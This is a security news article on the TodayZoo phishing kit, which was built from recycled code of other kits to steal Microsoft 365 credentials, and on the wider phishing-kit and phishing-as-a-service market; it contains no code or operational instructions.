Attackers behind an extensive phishing campaign utilized a partially recycled phishing kit in order to target victims’ Microsoft credentials leveraging phishing kits from renting them to building their own customized versions, dubbed TodayZoo, so called due to its “curious” use of these words in its credential harvesting component,
The copied code segments even have the comment markers, dead links, and other holdovers from the previous kits.TodayZoo being leveraged as the backbone for several widespread phishing campaigns. These emails used a variety of lures, including ones related to password resets or fax notifications. Targeted email recipients were prompted to click on a link, which led to initial and secondary redirect URLs before landing them on a page mimicking the Microsoft 365 sign-in page that asked for their credentials.
The phishing campaign used an old tactic called zero-point font obfuscation, where attackers hide words that could be flagged by natural language processing by inserting text with a zero font size between the words. Researchers also noted that the landing page’s source code revealed where the stolen credentials would be exfiltrated, an unusual move as typically credential harvesting pages forward the stolen passwords to attacker owned email accounts.
A Reconstructed Phishing Kit
The consistency of the campaign’s redirection URL patterns, domains and other TTPs led to believe that the attackers were using an old phishing kit template, and had replaced the credential harvesting part with their own exfiltration logic.
One of the clues for TodayZoo’s origins was the source code on its landing page, which included static references to external source codes. These typically help a phishing kit mimic the branding of the spoofed login page. But many of the site connections were “dead links,” identified by Microsoft as holdovers from other kits available for free or purchase.
TodayZoo linked to a code block called DanceVida, which many other phishing kits have leveraged. TodayZoo’s implementations matched 30 to 35 percent of the larger superset of kits referencing DanceVida, such as a similar phishing kit called “Office-RD117” that shared several components.
While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits.
The Rich Phishing Kit Marketplace
TodayZoo demonstrates the diversity of phishing kits that cybercriminals are recycling, renting or reselling. With phishing leading 33 percent of cyberattacks, cybercriminals on underground marketplaces are getting savvier in how they market, sell and deploy these types of attacks.
Phishing kits archive files comprising images, scripts and HTML pages that allow attackers to set up phishing landing pages are frequently built using chunks of code from other kits.These can be purchased via publicly accessible scam sellers, or reused or repackaged by kit resellers.
The phishing kit economy overall has transformed to become service based, as seen with a recently uncovered phishing-as-a-service operation called BulletProofLink that sells kits, email templates, hosting and automated services at a relatively low cost.
Cybercriminals have the option to either rent resources from phishing-as-a-service providers who then handle the legwork, or to make a one-time purchase of a phishing kit. Like TodayZoo other attackers also building their own phishing kit.
The abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits. They put these functionalities together in a customized kit and try to reap the benefits all to themselves.